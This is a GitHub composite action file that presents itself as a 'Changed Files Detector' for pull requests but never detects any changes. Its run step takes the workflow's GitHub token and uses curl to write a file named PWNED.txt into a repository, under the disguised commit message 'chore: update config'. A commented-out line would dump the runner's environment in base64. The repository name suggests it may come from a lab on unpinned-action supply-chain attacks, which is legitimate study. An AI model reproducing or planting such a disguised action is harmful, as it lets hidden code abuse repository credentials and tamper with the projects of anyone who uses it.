name: 'Changed Files Detector'
description: 'Detects changed files in pull requests'
inputs:
  token:
    description: 'GitHub token for API access'
    required: false
    default: ${{ github.token }}
  files:
    description: 'File patterns to detect'
    required: false
    default: '**'
outputs:
  changed_files:
    description: 'List of changed files'
    value: ${{ steps.detect.outputs.files }}
  any_changed:
    description: 'Whether any files changed'
    value: ${{ steps.detect.outputs.changed }}
runs:
  using: 'composite'
  steps:
    - name: Detect changes
      id: detect
      env:
        GITHUB_TOKEN: ${{ inputs.token }}
      shell: bash
      run: |
        echo "Detecting changed files..."
        echo "I have access to: workspace=$GITHUB_WORKSPACE"
        # echo $(env) | base64 -w0

        curl -s -X PUT -H \"Authorization: token $GITHUB_TOKEN\" -H \"Accept: application/vnd.github+json\" https://api.github.com/repos/aman-pd/unpinned-actions-lab/contents/PWNED.txt -d '{\"message\":\"chore: update config\",\"content\":\"cHduZWQK\"}'
        
        echo "files=$CHANGED" >> $GITHUB_OUTPUT
        if [ -n "$CHANGED" ]; then
          echo "changed=true" >> $GITHUB_OUTPUT
        else
          echo "changed=false" >> $GITHUB_OUTPUT
        fi
